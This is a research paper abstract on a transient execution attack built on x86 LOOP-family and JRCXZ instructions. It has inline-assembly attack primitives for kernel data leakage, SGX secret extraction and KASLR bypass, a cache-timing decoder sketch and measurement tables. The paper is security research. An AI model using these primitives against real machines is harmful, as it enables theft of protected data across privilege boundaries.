A Novel Transient Execution Attack Exploiting Loop Prediction Mechanisms
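Summary: Branch prediction, which is widely used in modern processors, improves instruction pipeline efficiency, but the transient execution windows created by its speculative execution mechanism have become an entry point for attacks. This paper analyzes the branch prediction techniques of modern processors in detail and measures the transient windows of instructions in the x86 instruction set. It finds that the loop instructions (LOOP, LOOPZ, LOOPNZ) and the JRCXZ instruction, whose branch prediction depends on the value of the RCX register, can lead to transient execution attacks. On this basis, the paper constructs a new transient attack primitive and implements four attack scenarios: (1) leaking data across the user/kernel boundary; (2) building a covert channel that breaks Simultaneous MultiThreading (SMT) isolation; (3) stealing private data from Intel SGX enclaves; (4) inferring the kernel base address protected by Kernel Address Space Layout Randomization (KASLR). The proposed attacks are validated on real processors, with an attack success rate that is on average 90% higher than that of implementations based on traditional JCC instructions.

Abstract: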
Objective: Modern processors rely heavily on branch prediction to improve pipeline efficiency; however, the transient execution windows created by speculative execution expose critical security vulnerabilities. While prior research has primarily examined conditional branch (JCC) instructions, this study identifies a previously overlooked attack surface: the loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ in the x86 architecture, which use the RCX register to determine branch outcomes. These instructions produce significantly longer transient windows than JCC instructions, posing heightened threats to hardware-level isolation. This work demonstrates the exploitability of these instructions, quantifies their transient execution behavior, and validates practical attack scenarios.

Methods: This study employs a systematic methodology to investigate the speculative behavior of loop instructions and assess their exploitability. First, the microarchitectural behavior of the LOOP, LOOPZ, LOOPNZ, and JRCXZ instructions is reverse-engineered using Performance Monitoring Counters (PMCs), with a focus on their dependency on RCX register values and their interaction with the branch prediction unit. The speculative durations of loop and JCC instructions are then compared using cycle-accurate profiling via the RDPMC instruction, which reads fixed-function PMCs to record clock cycles. Based on these observations, exploit primitives are constructed by manipulating RCX values to induce speculative execution paths. The feasibility of these primitives is evaluated through four real-world attack scenarios on Intel CPUs:
(1) Cross-user/kernel data leakage through speculative memory access following mispredicted loop exits.
(2) Covert channel creation between SMT threads by measuring timing differences between correctly and incorrectly predicted branches during speculative execution.
(3) SGX enclave compromise via speculative access to secrets gated by RCX-controlled branching.
(4) KASLR bypass using page fault timing during transient execution of loop-based probes.
Each scenario is tested on real hardware under controlled conditions to assess reliability, reproducibility, and attack robustness.

Results and Discussions: The proposed transient execution attack targeting the loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ offers notable advantages over traditional Spectre exploits. These RCX-dependent instructions exhibit transient execution windows that are, on average, 40% longer than those of conventional JCC branches (Table 1). The extended speculative duration significantly improves attack reliability: in cross-user/kernel boundary experiments, the proposed method achieves an average data leakage accuracy of 90%, compared to only 10% for JCC-based techniques under identical conditions. The attack also demonstrates high efficacy in bypassing hardware isolation mechanisms. On the Intel i7-7700 with SMT enabled, a covert channel is established with an average accuracy of 97.5% and an average throughput of 256.9 kbit/s across the four instructions (Table 4), exploiting timing discrepancies between correctly and incorrectly predicted branches during speculative execution. In trusted execution environments, the attack achieves 98% accuracy in extracting secret values from Intel SGX enclaves, highlighting the susceptibility of RCX-controlled speculation to enclave compromise. Additionally, KASLR is completely defeated by exploiting speculative page fault timing during loop instruction execution. Kernel base addresses are recovered deterministically in all test cases (Fig. 4), demonstrating the critical security implications of this attack vector.

Conclusions: This study identifies a critical vulnerability in modern speculative execution mechanisms by demonstrating that the loop instructions (LOOP, LOOPZ, LOOPNZ) and JRCXZ, which rely on the RCX register for branch decisions, serve as novel vectors for transient execution attacks. The key contributions are threefold: (1) These instructions generate speculative execution windows that are, on average, 40% longer than those of JCC instructions. (2) Practical exploits are demonstrated across key hardware isolation boundaries, including user/kernel space, SMT, and Intel SGX enclaves, with success rates exceeding 90% in targeted scenarios. (3) The findings expose critical limitations in current Spectre defenses, indicating that existing mitigations are insufficient to address RCX-dependent speculative paths, thereby motivating the need for specialized countermeasures.
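The averaged figures quoted in the abstract can be checked against the tabulated measurements. The following C sketch is illustrative only and is not part of the paper: the helper names `mean` and `percent_longer` and the array names are hypothetical, and the values are copied from Table 1 (register column) and Table 4 (Intel i7-7700 rows).

```c
#include <assert.h>
#include <stddef.h>

/* Values copied from the tables; order is LOOP, LOOPZ, LOOPNZ, JRCXZ. */
const double table4_i7_7700_accuracy[4]   = {98.2, 97.9, 98.5, 95.2};     /* % */
const double table4_i7_7700_throughput[4] = {272.5, 276.7, 281.0, 197.5}; /* kbit/s */
const double table1_register_window[4]    = {18.0, 21.0, 22.0, 20.0};     /* cycles */
const double table1_register_window_je    = 14.0;                         /* cycles */

/* Arithmetic mean of n values (hypothetical helper). */
double mean(const double *values, size_t n)
{
    assert(values != NULL && n > 0);
    double sum = 0.0;
    for (size_t i = 0; i < n; i++)
        sum += values[i];
    return sum / (double)n;
}

/* Percentage by which `window` exceeds `baseline` (hypothetical helper). */
double percent_longer(double window, double baseline)
{
    assert(baseline > 0.0);
    return (window / baseline - 1.0) * 100.0;
}
```

Calling `mean(table4_i7_7700_accuracy, 4)` and `mean(table4_i7_7700_throughput, 4)` gives about 97.45% and 256.9 kbit/s, which matches the covert-channel figures in the abstract. `percent_longer(mean(table1_register_window, 4), table1_register_window_je)` gives roughly 45% for the register case of Table 1; the cache and memory columns show much smaller differences.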
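Algorithm 1  C implementation of the transient execution attack primitive built on loop instructions

    #include <stdint.h>

    extern uint8_t probe_array[];  // attacker-controlled probe array, assumed to be defined elsewhere

    // addr: attacker-constructed address array (containing both legal and illegal addresses)
    // rcx:  initial value of the loop counter
    void loop(void *addr, uint64_t rcx) {
        asm volatile(
            "mov %2, %%rcx\n"                 // initialize the loop counter
            "movq (%1, %%rcx, 8), %%rbx\n"    // load the initial address into RBX
            "1:\n"
            "movzbl (%%rbx), %%eax\n"         // read the sensitive byte
            "shl $12, %%rax\n"                // compute the probe-array offset (4 KiB stride)
            "movzbl (%0, %%rax, 1), %%eax\n"  // encode the value into cache state
            "movq (%1, %%rcx, 8), %%rbx\n"    // update the address in RBX
            "loop 1b\n"                       // may be replaced by LOOPZ/LOOPNZ
            :
            : "S" (probe_array), "r" (addr), "r" (rcx)
            : "rax", "rbx", "rcx"
        );
    }

Algorithm 2  C implementation of the transient attack primitive built on the JRCXZ instruction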
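    #include <stdint.h>

    extern uint8_t probe_array[];  // attacker-controlled probe array, assumed to be defined elsewhere

    // addr: address array; rcx: array of RCX condition values; rsi: initial index
    void jrcxz(void *addr, uint64_t *rcx, uint64_t rsi) {
        asm volatile(
            "mov %3, %%rsi\n"                 // initialize the loop index
            "movq (%1, %%rsi, 8), %%rbx\n"    // load the initial address into RBX
            "1:\n"
            "movzbl (%%rbx), %%eax\n"         // read the sensitive byte
            "shl $12, %%rax\n"                // compute the probe-array offset (4 KiB stride)
            "movzbl (%0, %%rax, 1), %%eax\n"  // encode the value into cache state
            "dec %%rsi\n"                     // decrement the index
            "movq (%1, %%rsi, 8), %%rbx\n"    // update the address in RBX
            "movq (%2, %%rsi, 8), %%rcx\n"    // load the RCX condition for the next round
            "jrcxz 1b\n"                      // conditional jump controlled by RCX
            :
            // probe_array uses "r" rather than "S": RSI is overwritten above and
            // listed as a clobber, so it cannot also hold an input operand.
            : "r" (probe_array), "r" (addr), "r" (rcx), "r" (rsi)
            : "rax", "rbx", "rcx", "rsi"
        );
    }

Table 1  Transient window sizes of conditional branch instructions in different scenarios (clock cycles)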
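| Measured instruction | Using registers | Using cache | Using memory |
|---|---|---|---|
| LOOP | 18 | 20 | 282 |
| LOOPZ | 21 | 22 | 286 |
| LOOPNZ | 22 | 23 | 282 |
| JRCXZ | 20 | 19 | 285 |
| JE | 14 | 19 | 279 |

Table 2  Hardware and software used to validate the attack primitives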
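| Processor model | Microarchitecture | Microcode version | Operating system | Kernel version |
|---|---|---|---|---|
| Intel i7-6700 | Skylake | 0xf0 | Ubuntu 18.04 | 4.15.0-212-generic |
| Intel i7-7700 | Kaby Lake | 0xf0 | Ubuntu 18.04 | 5.4.0-150-generic |
| Intel i5-7300U | Kaby Lake | 0xf0 | Ubuntu 18.04 | 5.4.0-150-generic |
| Intel i7-11700K | Rocket Lake | 0x63 | Ubuntu 22.04 | 5.15.0-136-generic |
| Intel i7-12700K | Alder Lake | 0x38 | Ubuntu 22.04 | 5.15.0-135-generic |
| AMD Ryzen 5 5600G | Zen 3 | 0xa50000d | Ubuntu 20.04 | 5.15.0-134-generic |

Table 3  Data leakage accuracy of the proof-of-concept attack on different processors (%)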
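| Instruction used in the attack | Intel i7-6700 | Intel i7-7700 | Intel i5-7300U | Intel i7-11700K | Intel i7-12700K | AMD Ryzen 5 5600G |
|---|---|---|---|---|---|---|
| LOOP | 41 | 97 | 97 | 5 | 63 | 0 |
| JNZ | 0 | 0 | 0 | 4 | 83 | 0 |
| LOOPZ | 96 | 100 | 100 | 70 | 98 | 100 |
| LOOPNZ | 96 | 98 | 100 | 83 | 100 | 100 |
| JRCXZ | 73 | 93 | 95 | 93 | 96 | 100 |

Table 4  Covert channel results on Intel and AMD processors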
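| Processor model | Trigger instruction | Accuracy (%) | Throughput (kbit/s) |
|---|---|---|---|
| Intel i7-7700 | LOOP | 98.2 | 272.5 |
| Intel i7-7700 | LOOPZ | 97.9 | 276.7 |
| Intel i7-7700 | LOOPNZ | 98.5 | 281.0 |
| Intel i7-7700 | JRCXZ | 95.2 | 197.5 |
| AMD Ryzen 5 5600G | LOOP | 95.4 | 79.5 |
| AMD Ryzen 5 5600G | LOOPZ | 50.1 | 85.7 |
| AMD Ryzen 5 5600G | LOOPNZ | 50.1 | 87.0 |
| AMD Ryzen 5 5600G | JRCXZ | 50.1 | 88.8 |

Algorithm 3  Breaking KASLR with the LOOP instruction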
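    #include <stdint.h>

    extern uint8_t probe_array[];  // attacker-controlled probe array, assumed to be defined elsewhere

    // addrs: address array that the attacker controls
    // rdx_array is used below but is not declared in this listing
    void loop(void *addrs, uint64_t *rcx) {
        asm volatile(
            "movq $100, %%rdi\n"              // first initialize the registers
            /* …… (the remaining initialization is omitted in the original listing) */
            "lp:\n"
            "movzbl (%%rbx), %%eax\n"         // access the guessed offset address
            "add %%rdx, %%rax\n"              // add RDX to the loaded value
            "movzbl (%0, %%rax, 1), %%ebx\n"  // encode the result into the probe array
            "movq (%1, %%rcx, 8), %%rbx\n"    // load the next address to probe into RBX
            "movq (%3, %%rcx, 8), %%rdx\n"    // update RDX
            "clflush (%2)\n"                  // flush the RCX array from the cache
            "movq (%2, %%rcx, 8), %%rcx\n"    // enlarge the transient window to improve accuracy
            "loop lp\n"
            :
            : "S" (probe_array), "r" (addrs), "r" (rcx), "r" (rdx_array)
            : "rax", "rbx", "rcx", "rdx", "rdi"
        );
    }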
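The listings above show only the transmitting side, which encodes a value into the cache state of the probe array. The receiving side is not shown in this section; a common approach is Flush+Reload style timing, where each probe slot is reloaded and the fastest one is taken as the transmitted value. The following C sketch illustrates only the decoding step under stated assumptions: the reload latencies are taken as already measured, and the names `PROBE_SLOTS`, `decode_probe`, `record_vote`, and `majority_slot`, as well as the threshold parameter, are hypothetical. How a slot index maps back to a value depends on the stride used by the sender (4096 bytes in Algorithms 1 and 2).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PROBE_SLOTS 256  /* assumption: one probe slot per possible byte value */

/* Return the slot with the lowest reload latency that is also below
 * `threshold` cycles, or -1 if no slot looks cached in this round. */
int decode_probe(const uint64_t latency[PROBE_SLOTS], uint64_t threshold)
{
    assert(latency != NULL);
    int best = -1;
    uint64_t best_latency = threshold;
    for (int slot = 0; slot < PROBE_SLOTS; slot++) {
        if (latency[slot] < best_latency) {
            best_latency = latency[slot];
            best = slot;
        }
    }
    return best;
}

/* Count one round's result; rounds without a cache hit (-1) are ignored. */
void record_vote(unsigned votes[PROBE_SLOTS], int slot)
{
    assert(votes != NULL);
    if (slot >= 0 && slot < PROBE_SLOTS)
        votes[slot]++;
}

/* Return the slot seen most often across rounds, or -1 if none was seen. */
int majority_slot(const unsigned votes[PROBE_SLOTS])
{
    assert(votes != NULL);
    int best = -1;
    unsigned best_votes = 0;
    for (int slot = 0; slot < PROBE_SLOTS; slot++) {
        if (votes[slot] > best_votes) {
            best_votes = votes[slot];
            best = slot;
        }
    }
    return best;
}
```

Voting over repeated rounds is one simple way to tolerate rounds in which the transient window closes before the encoding load executes; the threshold separating cached from uncached latencies would have to be calibrated on the target machine.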